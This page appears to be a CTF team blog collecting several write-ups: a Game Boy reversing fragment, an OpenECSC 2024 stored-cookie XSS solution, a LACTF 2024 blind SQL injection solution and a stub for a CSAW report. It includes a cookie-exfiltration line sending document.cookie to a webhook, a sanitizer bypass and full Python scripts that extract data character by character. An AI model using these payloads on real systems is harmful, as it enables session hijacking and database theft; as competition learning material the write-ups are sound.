I got my first blood and i went to sleep at around 5AM pretty happy with myself, i was a bit less happy when i discovered i was the only solve for the challenge and i could have just gone to sleep at a normal time.

This thing got pretty long and i could not even include my fuzzing experiments with the challenge, congrats if you made down here, here is the full video of the solve:

BEWARE! FLASHING IMAGES!

your browser does not support the video tag.

Tools used

Ghidra with GhidraBoy, used as a dissassembler and decompiler, the extension produced some very readable code which helped me greatly with the challenge;
GearBoy, used as an emulator and debugger, it was already included in the challenge and the debugger offers all functionalities needed during reversing;
LogKeys, linux keylogger which i used to extract the moves i played on the more straightforward levels

OpenECSC 2024 - Perfect Shop

info@theromanxpl0.it (TRX) — Wed, 27 Mar 2024 00:00:00 +0000

“Do you like perfect things? Check out my new online shop!”

Prior knowledge: HTML, JavaScript

Context

The link to the challenge website and its corresponding source code are provided. At first glance, the website may seem a bit overwhelming: there are various functionalities, which means several endpoints and mechanisms to study in search of vulnerabilities.

However, fortunately, the code is relatively short and not very verbose, and all files except for server.js do not contain interesting elements: products.js gathers information about the products, while the various templates seem to only display elements passed by the server. Their presence can be kept in mind, but the existence of a Server Side Template Injection is temporarily ruled out.

Even before the declaration of the endpoints, you can see the following code at the beginning of server.js:

const express = require('express');
const crypto = require('crypto');
const sanitizer = require("perfect-express-sanitizer");

let products = require('./products');

const HEADLESS_HOST = process.env.HEADLESS_HOST || 'headless:5000';
const HEADLESS_AUTH = process.env.HEADLESS_AUTH || 'supersecret';
const WEB_DOM = process.env.WEB_DOM || 'web:3000';
const FLAG = process.env.FLAG || 'openECSC{this_is_a_fake_flag}';
const admin_password = crypto.randomBytes(20).toString('hex');

const app = express();
app.use(express.urlencoded({ extended: false }));
app.set('view engine', 'ejs');
app.use(sanitizer.clean({ xss: true }, ["/admin"]));

app.use((req, res, next) => {
    res.locals.errormsg = '';
    res.locals.successmsg = '';
    next();
});

It’s already possible to notice something interesting. The first half of the code does nothing but import libraries.

Key Concepts for This Challenge

I’ve decided to write down the key concepts necessary to solve the challenge so that the writeup can reach players who are not accustomed to the CTF context, given the nature of the competition. A CTF player and/or a programmer can directly read the summary of available information or a previous subsection that interests them.

Sending Information to the Server

Starting from const app = express();, which confirms the use of express as the web framework of the site, the next line allows the programmer to access the data sent by users in POST requests as body parameters through req.body.[parameter].

Body parameters are the information that the website receives without passing through either query parameters (in https://www.google.com/search?q=openECSC, q is the query parameter and openECSC is its value), or through headers including cookies. Typically, body parameters “pass” the information that the user enters in a form to the server, which handles it according to the programmer’s intentions.

Summary:

As you can see, it’s not mandatory for what the user sees and what is sent to the server to be the same. In this case, regarding the product, it’s much easier for the server to work with the id rather than the name, which in any case would still uniquely represent the selected product. It’s also fair to say that the programmer will access this information through the properties req.body.id and req.body.message.

Basics of XSS

Continuing, it’s noticeable that ejs is the chosen template engine for this app.

Moving forward, the application is instructed to use perfect-express-sanitizer to avoid the risk of XSS (Cross-Site Scripting), except for the /admin endpoint. This type of attack is very straightforward: it occurs when a site can be manipulated to allow the execution of JavaScript code not explicitly written by the programmer. The most peculiar example is inserting a tag like this: . If this tag is inserted in a search page that prints what the user has searched for without any sanitization, the tag will be interpreted and the script executed:

This attack is “temporary”, only valid for the victim request, and it’s called reflected XSS. If the payload/attack vector (in this case ) had been somehow stored by the application, like, for example, in a comment, the attack would have been a stored XSS.

Handling Request and Response in Express

The last portion of code doesn’t show anything interesting. res.locals.errormsg and successmsg, if not null, appear as pop-ups containing useful information for the user (e.g., “search too long”).

It might be more useful to focus on the req and res parameters. These two parameters are present in all endpoints, and serve respectively to obtain information from and/or about the newly received request (req), and to “assign” information to the outgoing response, including those related to the aesthetics of the page.

Summary of Available Information

We know that the application sanitizes all inputs from XSS thanks to app.use(sanitizer.clean({ xss: true }, ["/admin"])); except for the /admin endpoint and that express is used as the web engine.

Endpoints

Although the “playing field” turned out to be less extensive than expected, there are several endpoints to analyze. Therefore, it’s important to understand their functionality from the beginning.

/ (homepage)

This is the first screen displayed when entering the site, or when a GET request is made to the / endpoint:

The related code is as follows:

app.get('/', (req, res) => {
    res.render('products', { products: products });
});

Nothing interesting here: the template responsible for displaying a list of certain products, as shown in the screenshot, is rendered.

In particular, res.render() is a function that calls a certain template (first parameter) and passes it some information (second parameter). The template is responsible for displaying the information related to all entities passed as the second parameter in a generally ordered and aesthetically pleasing manner.

In this case, no filter is applied to the products variable, so all products will be displayed.

/product/:id

The two colons preceding id indicate that it is a value that can be arbitrarily chosen by the user. One can imagine that there are various products, and this is a way to allow for a route for each of them without explicitly specifying one for each.

app.get('/product/:id', (req, res) => {
    const id = parseInt(req.params.id);

    if (isNaN(id) || id < 0 || id >= products.length) {
        res.status(404).send('Not found');
        return;
    }

    res.render('product', { product: products[id] });
});

Here, the value entered by the user as the id is parsed as an integer and assigned to the variable with the same name (i.e., ensuring that the value is actually an integer, and when it is not, it is transformed into an integer according to certain criteria).

If the id is not recognized (the product does not exist), a 404 “not found” error is returned; otherwise, a template is rendered that returns a result similar to the one shown in the photo for the chosen product.

/search

A classic search functionality that filters results based on the product name.

app.get('/search', (req, res) => {
    let query = req.query.q || '';

    if (query.length > 50) {
        res.locals.errormsg = 'Search query is too long';
        query = '';
    }

    const result = products.filter(product => product.name.toLowerCase().includes(query.toLowerCase()));

    res.render('search', { products: result, query: query });
});

If the search string passed as a query parameter is empty, the query variable is assigned an empty string. This also happens when the search string is too long, exceeding 50 characters.

Then, a case-insensitive filter is applied based on the product name: if the searched string is not found in the product name, then that product is not included among the products to render. As you can see by trying to use the endpoint and by inferring from the rendering line, the query will also be returned as output after performing the search in addition to the found products.

This would be very useful for a simple reflected XSS, but the length filter and especially the omnipresent sanitization do not allow it. Too bad 😔

/admin

An admin panel with a list of all available products.

app.get('/admin', (req, res) => {
    res.render('admin', { products: products });
});

The XSS filter on this route is disabled, yet there are no traces of HTML tags or similar.

/admin/:id

GET

Product editing page, part of the admin panel.

app.get('/admin/:id', (req, res) => {
    const id = parseInt(req.params.id);

    if (isNaN(id) || id < 0 || id >= products.length) {
        res.status(404).send('Not found');
        return;
    }

    res.render('edit_product', { product: products[id] });
});

The code is practically identical to that of the search route. It serves to identify the product that the admin wishes to modify.

Already here we could pose a huge question ;)

POST

Product modification action by the admin.

app.post('/admin/:id', (req, res) => {
    const id = parseInt(req.params.id);

    if (isNaN(id) || id < 0 || id >= products.length) {
        res.status(404).send('Not found');
        return;
    }

    if (req.body.password !== admin_password) {
        res.locals.errormsg = 'Invalid password';
        res.render('edit_product', { product: products[id] });
        return;
    }

    if (req.body.name) {
        products[id].name = req.body.name;
    }

    if (req.body.description) {
        products[id].description = req.body.description;
    }

    const price = parseFloat(req.body.price);
    if (!isNaN(price) && price >= 0) {
        products[id].price = req.body.price;
    }

    res.locals.successmsg = 'Product updated successfully';
    res.render('edit_product', { product: products[id] });
});

Given the password check, which is generated completely randomly, we could even ignore the code, as this is an endpoint impossible to trigger for regular users. The fact that the challenge is on a shared instance (all participants must solve the challenge on the same server) is already a big hint that we cannot modify the products as we please, potentially harming other participants. Imagine if someone could have the idea of giving RCE or this type of XSS on a shared instance :D

For completeness: the id passed by the user is parsed into id. A check is made on the existence of the product and on the correctness of the password. If both pass, all fields that are not empty on the edit page are modified, and also the price if the integrity check is passed (it simply checks that the price is a valid non-negative float). If the modification is successful, a success message is displayed, and in any case, at the end, you are redirected to the edit page.

Report

GET

Simply renders the report page.

app.get('/report', (req, res) => {
    res.render('report', { products: products });
});

It’s possible to see how the list of products serves the report page to allow the user to choose the product for which to file a complaint in the drop-down list.

POST

User reporting action.

app.post('/report', (req, res) => {
    const id = parseInt(req.body.id);
        if (isNaN(id) || id < 0 || id >= products.length) {
        res.locals.errormsg = 'Invalid product ID';
        res.render('report', { products: products });
        return;
    }

    fetch(`http://${HEADLESS_HOST}/`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json', 'X-Auth': HEADLESS_AUTH },
        body: JSON.stringify({
            actions: [
                {
                    type: 'request',
                    url: `http://${WEB_DOM}/`,
                },
                {
                    type: 'set-cookie',
                    name: 'flag',
                    value: FLAG
                },
                {
                    type: 'request',
                    url: `http://${WEB_DOM}/product/${req.body.id}`
                },
                {
                    "type": "sleep",
                    "time": 1
                }
            ]
         })
    }).then((r) => {
        if (r.status !== 200) {
            res.locals.errormsg = 'Report submission failed, contact an admin if the problem persists';
        } else {
            res.locals.successmsg = 'Report submitted successfully';
        }
        res.render('report', { products: products });
    }).catch(() => {
        res.locals.errormsg = 'Failed to submit report, contact an admin if the problem persists';
        res.render('report', { products: products });
    });
});

Headless Bot Verification

At the outset, after parsing and checking the existence of the product as seen before, a fetch to a headless is performed.

While this might seem overwhelming, the functioning of the headless is straightforward:

The fetch visits the site indicated in the constant HEADLESS_HOST, which cannot be known unless the application’s configurations are known.

At this address, a POST is made, with headers indicating to the headless that it is about to receive data in JSON format.

Since the source code of the headless is not available, the exact mechanism behind the implementation of actions cannot be determined precisely. However, it is sufficient to know that there are instructions being executed sequentially, for the scope of the challenge.

The succession of actions is as follows:

A GET request is made to the Perfect Shop, to allow the next step;
A flag cookie related to the Perfect Shop is set, with the value being the flag to be extracted to solve the challenge;
A GET request is made to http://${WEB_DOM}/product/${req.body.id}, where WEB_DOM is the address of the Perfect Shop, and req.body.id is the id passed by the user during the reporting process;
Nothing is done for one second.

After this, various error and success cases are handled. Two different messages are printed based on whether the error is detected by the challenge server’s JavaScript code, or if a status code other than 200 is returned by the headless.

In essence, the user’s report is being verified by a bot, simulating the behavior of a logged-in admin who presumably has session/authentication cookies related to the Shop and who checks the product with the id indicated by the user at the time of the report.

Setup

Having the challenge running locally greatly facilitates the process of understanding every tiny part of the application being attacked. In this case, the organizers have also delivered the source code with well-crafted Docker Compose files that allow setting up the infrastructure in a breeze.

Docker

Docker enables the creation of “magic boxes” (containers) containing certain software that can be executed as if it were running on the developer’s computer.

This means that developers can distribute infrastructures based on specific operating systems and configurations without requiring users to switch to such OS or modify their configurations.

Docker Compose

An application might require multiple containers, envisioning a site with a dedicated server for the web engine and another for the database (as in this challenge).

Docker Compose files are like maps that aid in the coordinated management of different logically linked containers. They specify which containers need to be started simultaneously with a single command, along with information about them such as the values of their environment variables, the ports they can use, their dependencies, etc.

Receiving well-crafted Docker Compose files along with the source code of the challenge means being able to easily test locally with a single command and modify the code as needed to better understand the limits of our payloads and the nature of the vulnerabilities of the site being attacked.

This Challenge

Linux

To simply run the challenge, just execute sudo docker compose up in the challenge folder to start all the containers. As indicated in both server.js and the docker-compose.yaml file, the site will be accessible on port 3000.

If for any reason you need to modify the source code of the challenge, simply make the desired changes, save the file, and then run sudo docker compose build web. In this case, specifying web indicates that only the container related to the web server should be rebuilt, rather than all containers.

Windows

Start the Docker Engine. If you have Docker Desktop, simply launch it, and the Engine will start automatically. From the terminal, navigate to the Perfect Shop folder and execute docker compose up to start the challenge locally, and docker compose build web if you wish to apply any changes. Similarly, specifying web indicates that only the container related to the web server should be rebuilt, rather than all containers.

How to Attack?

The presence of a bot effectively guarantees that we’ll need to exploit a client-side vulnerability, as clearly confirmed by the presence of an XSS filter.

There are three things that might raise eyebrows when conducting a static code analysis (I didn’t notice two of these during the competition):

The entire input is being parsed and not casted, which means the parsed value and the unparsed value could be logically very different;
The only endpoint exempt from input sanitization is /admin, but some HTML tags could also be found in /admin/:id (they are different endpoints);
During the reporting phase, the report itself is related to the product with the parsed ID passed by the user, but the bot visits the product endpoint with the unparsed ID passed by the user. Connecting back to the first point, the values could be completely different from each other;

Parsing

The ID is parsed using the parseInt() function. As stated in the documentation, the only requirement for a string to be parsed as an integer is that it starts with a digit. But what happens if a string starts with a digit but contains other characters and symbols?

The console of major browsers’ DevTools is a great friend in this type of challenge. It can usually be accessed with fn+F12 > console

Simply put, the rest of the string is brutally truncated. The same goes if there are digits before, then characters, and then more digits. From the first encountered character onwards, everything is completely ignored by parseInt.

Endpoint inheritance???? (It’s not a real thing don’t look it up)

As visible from the screenshot shown earlier, there are tags in /admin/:id, despite only /admin being excluded from sanitization. At this point, the only option is to delve into the sanitizer’s workings, which in this case is imported from the perfect-express-sanitizer library. Specifically, in the challenge, version 1.0.13 was being used.

There are several modules related to sanitization, while index.js is the file responsible for managing the whitelist:

const sanitize = require("./modules/");

function middleware(
  options = {},
  whiteList = [],
  only = ["body", "params", "headers", "query"]
) {
  return (req, res, next) => {
    only.forEach((k) => {
      if (req[k] && !whiteList.some((v) => req.url.trim().includes(v))) {
        req[k] = sanitize.prepareSanitize(req[k], options);
      }
    });
    next();
  };
}

module.exports = {
  clean: middleware,
  sanitize,
};

The portion of code responsible for managing the whitelist is present in the if statement: !whiteList.some((v) => req.url.trim().includes(v)). The sanitization inside the if statement is only executed if the URL passed in the request does not include elements present in the whitelist. In particular, the use of some() allows checking if even a single element of the whitelist is present in the URL, in which case the condition becomes true, while trim() removes any spaces present at the beginning and end of the request URL.

This means that just as /admin is excluded from sanitization, so is /admin/:id.

It’s quiz time!!! From which of these elements can a URL be composed?

host
path
querystring (query parameters)
all of the above

Correct answer! You’re really good ^^

Armed with this information, we can move on to the next point.

Traveling Bot

Yes, there is a discrepancy between the parsed id and the id of the product that will be visited by the bot, but what does it change for us? Leading the bot to http://perfectshop.challs.open.ecsc2024.it/product/1hehJHAHajhajseheja instead of http://perfectshop.challs.open.ecsc2024.it/product/1 as expected can be amusing, but nothing more.

There is a powerful weapon that can be used in these cases, namely ../, which in a path means “go up one folder”. The same can apply to an endpoint: http://perfectshop.challs.open.ecsc2024.it is equivalent to http://perfectshop.challs.open.ecsc2024.it/product/1/../../ (if the concept is not clear, I suggest playing around with it).

This means that we can send the bot around. In itself, it’s not a big deal, but by combining this with the other points mentioned, it’s already possible to imagine a chain to create a working exploit, at least on paper. If that’s not the case, you’re just like me, and it might be useful to proceed by reading…

Studying the target by playing around

Fuzzing is the art of experimenting and finding out, a technique proven by numerous cybersecurity experts, papers on the subject, and CTFers.

Together with desperation, food, and time constraints, it has been the most useful thing for solving this challenge.

Jokes aside, initially, I didn’t notice almost anything of what I’ve written so far in this writeup, and knowing my tendency to quickly abandon a challenge that I initially define as “difficult”, I decided to try a new approach.

I tend to overlook various things during the exploration of a challenge, so having access to the source code and the Dockerfile, I decided to disable all filters and gradually re-enable them as I adapted the payload to the various constraints imposed on me.

First step: Reflected XSS without filters

In the server.js file, I edited the following lines:

I decided to maintain decency on the length filter to avoid ending up with comically long payloads.

At this point, all that’s left is to build and deploy the challenge and see how it goes.

As expected, with the filters disabled, we can successfully exploit it. And steal a cookie?

Cookies are a special type of header, and for this reason, there’s a kind of shortcut in JavaScript that allows accessing them, namely the document.cookie property.

To successfully exfiltrate a user’s cookies on the website, you need an endpoint reachable by the victim, which means exposing a server to make it accessible to anyone.

Webhooks are… versatile things. For this challenge, a website like webhook.site allows using them as if you were using your own server exposed to the outside world.

For a test, you can use a payload like this:

In this type of payload, it’s important not to use a random HTML tag, but to ensure that JavaScript code is actually executed (it’s okay to insert the webhook URL concatenated with document.cookie inside an onerror, but not in a simple src) so that document.cookie is “reachable”.

Also, you need to append the cookies as query parameters (for webhook and personal server) or as a path (for a personal server only). Failing to do so means appending the cookies as part of the host, which means the request will never reach the desired destination. For example, instead of ending up at myhost.com, it would end up at myhost.comCOOKIENAME=COOKIEVALUE, which makes no sense, unlike myhost.com?c=COOKIENAME=COOKIEVALUE or myhost.com/COOKIENAME=COOKIEVALUE (which doesn’t make sense with webhook.site, unless you own that domain).

Executing the payload above by sending it to the search page yields the following result on webhook.site:

There are the cookies!

Perhaps it would have made more sense to find a valid payload with the character filter first, but during the competition, I was a bit panicked and wanted to make sure I could steal the bot’s cookies without problems. Unfounded fear, as there was no kind of control in this regard, and the value of httpOnly for the flag cookie wasn’t specified, which means it will be set to the default value of false.

What does this mean? For security reasons, the optional httpOnly flag was introduced for cookies, which if set to true, prevents JavaScript code in the document from accessing document.cookie, mitigating exactly the type of attack I’m about to perform.

But first, let’s delve into the bot’s operation and the related report page.

All fine, here’s the ID and the message. Checking the logs, which appear on the terminal from which the docker compose was launched, it’s also possible to verify which page was visited by the bot:

And if, for no reason, you wanted to send an ID different from those prefixed by the select proposed by the developer? In this case, it’s very useful to modify the request with Burp Suite or similar tools. Unfortunately, I don’t have the time to show you how to set up Burp on your trusted browser (this tutorial may be helpful) or to show you the process to solve the challenge without using similar tools.

What I did was change the value of id from 1 to 1/../../search?q=Incredible before it was sent to the server and consequently to the bot. To clarify, I would have achieved the same result if I had done this:

Checking the logs, it can be seen that the bot is redirected to search?q=Incredible:

A brief check of the site’s route structure confirms this.

Now all that’s left is to try the payload that worked before to exfiltrate our cookie on the bot. Trying the payload , you would notice that the complete URL being visited is http://localhost:3000/search?q= or http://perfectshop.challs.open.ecsc2024.it/search?q= depending on whether you are testing the challenge locally or on the competition server.

This means that the same request must be made by the bot, which means making the same modification made before, combining it with the exploit already used:

Of course, I’m not URL-encoding the payload here just to make it easier to understand what’s happening, but you viewers at home must remember to URL-encode properly <3 (on Burp, CTRL+U highlighting the text to be URL-encoded):

First, URL-encode for the query parameter value that the bot will send to the search endpoint, and then URL-encode for the entire payload that is about to be sent to the bot.

Sending this payload, you’ll receive a request on the webhook with the test flag set in the config:

On line 16, let’s modify the sanitizer again to set it as in the original application, then rebuild everything:

app.use(sanitizer.clean({ xss: true }, ["/admin"]));

Once the application is rebuilt, you’ll notice that none of the payloads used previously will work anymore, being replaced instead by an empty string.

In this step, there are very few tricks that can be done. To solve this problem, one had to notice the error present in the sanitizer library, and during the competition, it was a far-from-immediate step.

Let’s say that for any reason, whether you tried to enter an /admin in the request as a query parameter, or during static analysis, you noticed that something was wrong with the sanitizer, now it’s known that if /admin is a substring of the request URL (remember once again: query parameters are part of the URL), it will cause the sanitizer to ignore any type of XSS payload that is sent.

One very convenient thing is that if you decide to insert an unused query parameter in the request, it will simply be sent to the server and not used. This means that you can send a completely random parameter with the value /admin to skip any kind of sanitization without having to modify the payload in some convoluted way.

So, if before in the reporting phase you sent id=1/../../search?q=&message=openECSC, now you can send something similar to id=1/../../search?lol=/admin&q=&message=/admin.

Note how I had to use one /admin to bypass the filter when communicating with the bot and another to bypass the filter when tricking the bot into performing a search in the related endpoint.

Of course, starting such a chain (?) means properly handling URL encoding to ensure that the parameters are correctly spread between the POST made to the report endpoint (to which the parameters id and message will be sent) and the request made by the bot to the search endpoint (to which the necessary parameter search and the dummy parameter lol will be sent).

Once the URL encoding is correctly applied, the result should be this: id=1/../../search%3flol%3d"/admin"%26q%3d&message=/admin.

Since it’s not excluded by the filter, it will be necessary to bypass the filter also in the report endpoint. To do this, simply add any query parameter with the value /admin or '/admin' in the report URL. In Burp Suite, the final payload will be:

By doing this, you should again get the flag on the webhook as before. Now there’s one last obstacle to overcome…

Last Step: Length Filter Bypass

This step didn’t require any rocket science. Let’s say I simply aimed to find the shortest possible payload with the same philosophy as the previous ones. For completeness, I’ll add a subsection with the various things I tried during the competition.

What I Tried During the Competition

First of all, I tried several times to exploit unicode normalization, with a payload like , so that it included the file from my server, executed it, and sent me the flag by changing the page’s address from that of the challenge to that of my webhook, including the cookie parameters related to the challenge site as query parameters.

How to expose your server to the world

To expose your files to the rest of the internet, you don’t need to physically own a server. Your PC can serve this purpose without much trouble. All you need is Python to do what I did during the competition, so I believe any operating system that supports Python also allows you to expose a server as I’m about to show:

Firstly, you need to get your local IP, which on Linux you can obtain by running the command ifconfig:

You will likely see an IP starting with 192.; here, I tested it on my university’s MAN.

Then, to expose the file containing the payload to the local network, you can use the Python command python3 -m http.server [PORT]. This command sets up a simple HTTP server that exposes all files in the folder and its subfolders where the command was executed. This means that at the URL http://[IP]:[PORT]/x.js, if everything is set up correctly, you should find the payload.

Opening it, you should be able to see the payload, which is not being executed. Do not be afraid; when this is included in the script tag, it will be executed as necessary.

As all good kids know, it’s the router that communicates with the fantastic world of the internet, not our device directly, which only receives and sends information via the router. To find out what your external IP address is, you can use an online service like whatismyip.com.

At this point, we have almost everything: we know the IP address where the file to be included in the script tag passed to the bot will be located (i.e., the IP we just found), and we know the port on our device where our files are exposed (after all, we chose it).

But there’s one step missing: the router is reachable from the outside world, but the server hosted on the device is only reachable within the local network. Somehow, we need to tell the router that when a request is received on a certain port, that request should be handled by the Python server.

Port forwarding allows us to do this. The procedure for enabling it varies greatly depending on the router manufacturer.

As for the protocol, it’s important to select TCP/UDP or similar if available; otherwise, it’s better to create a port forwarding table for each protocol.

The WAN port is the port that will be reachable from the outside, while the LAN port is the port that will receive packets from the outside. Essentially, it’s the one chosen when the HTTP server was set up in Python. To avoid errors, I would recommend using the same LAN and WAN port (internal and external) where possible.

The destination IP is the local IP of the device used, i.e., the one I obtained with ifconfig, or ipconfig in Windows.

This way, when the router receives a request on the selected WAN port, the packet will be forwarded to the local IP and port entered in the port forwarding table.

To test that everything has been done correctly, simply visit [public IP of the router]:[WAN port] from any device, preferably not connected to the same local network as the server hosting the exploit (e.g., a phone with mobile data).

Final Payload

Let’s make it happen.

To recap:
- The finalized payload to include the remote JavaScript code is .
- The code present on x.js is window.location = "https://webhook.site/[REDACTED]?c=" + document.cookie;.
- All that’s left is to send the bot a report like this:
id=1/../../search%3flol%3d"/admin"%26q%3d&message=/admin, which decodes to id=1/../../search?lol="/admin"&q=&message=/admin

To anyone who managed to read this far, thank you from the bottom of my heart ❤️

For any feedback, you can reach me out on Discord: titto_caru

LACTF 2024 - penguin-login

info@theromanxpl0.it (TRX) — Sun, 18 Feb 2024 00:00:00 +0000

“I got tired of people leaking my password from the db so I moved it out of the db.”

Prior knowledge: basic web-related knowledge, SQL

Context

We are provided with the link to the challenge website and the corresponding source code. The website is quite simple, and the usage of its features is straightforward:

All the code is in app.py:

...
allowed_chars = set(string.ascii_letters + string.digits + " 'flag{a_word}'")
forbidden_strs = ["like"]


@cache
def get_database_connection():
    # Get database credentials from environment variables
    db_user = os.environ.get("POSTGRES_USER")
    db_password = os.environ.get("POSTGRES_PASSWORD")
    db_host = "db"

    # Establish a connection to the PostgreSQL database
    connection = psycopg2.connect(user=db_user, password=db_password, host=db_host)

    return connection


with app.app_context():
    conn = get_database_connection()
    create_sql = """
        DROP TABLE IF EXISTS penguins;
        CREATE TABLE IF NOT EXISTS penguins (
            name TEXT
        )
    """
    with conn.cursor() as curr:
        curr.execute(create_sql)
        curr.execute("SELECT COUNT(*) FROM penguins")
        if curr.fetchall()[0][0] == 0:
            curr.execute("INSERT INTO penguins (name) VALUES ('peng')")
            curr.execute("INSERT INTO penguins (name) VALUES ('emperor')")
            curr.execute("INSERT INTO penguins (name) VALUES ('%s')" % (flag))
        conn.commit()


@app.post("/submit")
def submit_form():
    try:
        username = request.form["username"]
        conn = get_database_connection()

        assert all(c in allowed_chars for c in username), "no character for u uwu"
        assert all(
            forbidden not in username.lower() for forbidden in forbidden_strs
        ), "no word for u uwu"

        with conn.cursor() as curr:
            curr.execute("SELECT * FROM penguins WHERE name = '%s'" % username)
            result = curr.fetchall()

        if len(result):
            return "We found a penguin!!!!!", 200
        return "No penguins sadg", 201

    except Exception as e:
        return f"Error: {str(e)}", 400

    # need to commit to avoid connection going bad in case of error
    finally:
        conn.commit()
...

We know that the website uses Postgres as the RDBMS/SQL database, and that the flag is contained in the penguins table along with the penguins.

The code is straightforward: the first half deals only with connections and setup, while the submit endpoint checks that the characters entered by the user are part of the whitelist (letters, numbers, {}, and _), which effectively consists of the characters that can be part of the flag.

The ideal thought process

A quick analysis of the code can already tell us everything we need to know, but why not play around with the only input available on the site?

We can thus see the differences in response depending on the input. If a penguin is found, a status code is returned, while if nothing is found, we get a 201.

As we can see in line 63, the query is constructed using string interpolation with %-formatting which allows for user input. This approach is vulnerable to SQL injection, and the challenge author has simulated a makeshift solution through a system of whitelisting e blacklisting.

Exploiting the vulnerability

There’s no way to use comments! How will we do it??? 😭😭😭 In this case, it’s not a tragedy, since we only need to get rid of one apostrophe. We just need to close the payloads with a string. This means that instead of using the classic logic SQLi test ' OR 1=1, we’ll use its alternative ' OR 'a'='a', without the final apostrophe since we’ll use the last ‘a’ to “burn” the extra apostrophe present in the code.

Nice thinking, the problem is that the equal sign is not whitelisted. We can’t even use LIKE instead of the equal sign, since it’s blacklisted.

In SQL, we can indicate boolean values with 0 and 1, and this applies even if they are strings. So, just like ' OR 1 returns TRUE, so does ' OR '1.

It works! Now we just have to adjust the injection in order to exfiltrate the flag.

But there’s no way to use LIKE (I’m not completely sure about this one, but I did not use it). Searching on the internet for LIKE alternative in postgreSQL, among the top results, I found sections 6.6 and 9.7 of the documentation, both concerning pattern matching. In these parts of the documentation, an alternative to the LIKE statement is indicated, namely SIMILAR TO, which differs from the former only in the interpretation of RegEx. For our purposes, there is no difference.

At this point, we have practically won, and all that’s left is to build the payload and the corresponding script. Probably SQLmap already had some shit available for the occasion, but I don’t really care.

Tips for beginners

At this point, for a player with a decent level of experience, the challenge is already solved. However, if it’s one of the first times solving a SQLi UNION-based challenge, it’s possible to take a few extra intermediate steps to make it clearer what is being executed by the DBMS and how the payload should be constructed.

Copying the vulnerable line, and playing with it

In the line "SELECT * FROM penguins WHERE name = '%s'" % username, our input is directly inserted in place of %s. To ensure that you are writing a sensible payload, you can first try writing it in place of the placeholder:

SELECT * FROM penguins WHERE name = '' OR '1'

Make sure not to use the mouse or arrow keys (in other words, don’t move the cursor) while you’re testing your inputs ;)

Understanding if the payload makes sense

Instead of blindly using a command/trick/workaround/technique that you see for the first time, make sure first that it works as you imagine in a more “relaxed” context, where you can write and access outputs and error logs without limitations. Discovering that the query returned false because you were not running the command correctly, or that it errored because the command was related to another DBMS, is particularly frustrating.

There are services (like OneCompiler, that allow you to execute code directly online. Always make sure 100% when using these services that you have selected the right DBMS.

Proceed in phases

It’s helpful to reason in phases the first few times. In mathematics, we can start skipping steps during calculations, but only because we’ve become familiar enough:

Identify your goal: in this case, “I want to get the flag” -> “I want to get all the characters of the record that starts with the flag format and ends with }”.
Write it down as you would normally: SELECT name WHERE name LIKE 'lactf{ % }'.
Rewrite it bypassing whitelist and blacklist: SELECT name WHERE name SIMILAR TO 'lactf{_}' with as many _ as there are characters in the flag.
Combine the two techniques shown previously: SELECT name WHERE name SIMILAR TO 'lactf{_}' + SELECT * FROM penguins WHERE name = '%s' -> remembering that the only column in the DB is name, and that we can only write commands in place of %s: SELECT * FROM penguins WHERE name = '' UNION SELECT name WHERE name SIMILAR TO 'lactf{_}'

The payload will simply be what we wrote in this last phase, which is ' UNION SELECT name WHERE name SIMILAR TO 'lactf{_}

Constructing the payload

At this point, all we have to do is construct a UNION with a SIMILAR TO instead of the more popular LIKE. In my case: ' UNION SELECT name WHERE name SIMILAR TO 'lactf{_}.

I’m not sure if there was a more convenient way to get the length of the flag, but I just added underscores until I got a positive result. These are the payloads useful for extracting the flag, modified from those used during the competition:

findlen.py

from requests import *

URL = "https://penguin.chall.lac.tf/"
s = Session()
payloadStart = "' OR name SIMILAR TO 'lactf{"
payloadEnd = ""
i = 0

while True:
    payload = payloadStart + payloadEnd + "}"
    r = s.post(URL + "submit", data={"username": payload})
    if r.status_code == 200:
        print("worked: ", payload)
        break
    else:
        payloadEnd += "_"
        print("failed: ", payload)

findflag.py

from requests import *
from string import digits, ascii_uppercase, ascii_lowercase

URL = "https://penguin.chall.lac.tf/"
s = Session()
payloadStart = "' OR name SIMILAR TO 'lactf{"
payloadEnd = "______________________________________"
i = 0

while True:
    if len(payloadEnd) > 0:
        payloadEnd = payloadEnd[:-1]
    else:
        break
    for c in digits + ascii_lowercase + ascii_uppercase:
        payload = payloadStart + c + payloadEnd + "}"
        r = s.post(URL + "submit", data={"username": payload})
        if r.status_code == 200:
            print("worked: ", payload)
            payloadStart += c
            break
        else:
            print("failed: ", payload)
    else:
        payloadStart += "_"
        print("skipping: ", payload)

Due to infrastructure issues, the first character of the flag couldn’t be retrieved. I had to guess it (in quite a few attempts xd)

lactf{90stgr35_3s_n0t_l7k3_th3_0th3r_dbs_0w0}

How it actually went during the CTF

One evening, I was at the gym to vent the frustration of not being able to find a rock on the west coast of California, United States (I love OSINT). Just before leaving, I heard that one of my teammates was having a bad time with an SQLi. “Let me solve it,” I wrote to him.

I hadn’t read the code yet when I received a message on Discord from said player, expressing interest in solving the challenge. “Just use _”, I said jokingly. I didn’t know that the character was actually whitelisted.

My teammate had already discovered the existence of SIMILAR TO, so once I got home, I only had to deal with writing the payload.

Payload used during the CTF

findlen.py

from requests import *
from bs4 import BeautifulSoup

URL = "https://penguin.chall.lac.tf/"
s = Session()
payloadStart = "' OR name SIMILAR TO 'lactf{"
payloadEnd = ""
i = 0

while True:
    payload = payloadStart + payloadEnd + "}"
    r = s.post(URL + "submit", data={"username": payload})
    soup = BeautifulSoup(r.text, "html.parser")
    if "We found a penguin" in soup.get_text():
        print("worked: ", payload)
        break
    else:
        payloadEnd += "_"
        print("failed: ", payload)

findflag.py

from requests import *
from bs4 import BeautifulSoup
from string import digits, ascii_uppercase, ascii_lowercase

URL = "https://penguin.chall.lac.tf/"
s = Session()
payloadStart = "' OR name SIMILAR TO 'lactf{"
payloadEnd = "______________________________________"
i = 0

while True:
    payloadEnd = payloadEnd[:-1]
    for c in digits + ascii_lowercase + ascii_uppercase + "!-@":
        payload = payloadStart + c + payloadEnd + "}"
        r = s.post(URL + "submit", data={"username": payload})
        soup = BeautifulSoup(r.text, "html.parser")
        if "We found a penguin" in soup.get_text():
            print("worked: ", payload)
            payloadStart += c
            break
        else:
            print("failed: ", payload)
    else:
        print("end: ", payload)
        break

I was too lazy to press F12 while playing around, so I just based my final payload on the "We found a penguin!!!!!" response.

CSAW '23 Embedded Security Challenge Report

info@theromanxpl0.it (TRX) — Thu, 28 Sep 2023 00:00:00 +0000

We participated in the CSAW Embedded Security Challenge 2023. Below is our qualification report that allowed us to qualify for the final, which took place at Esisar in Valence.

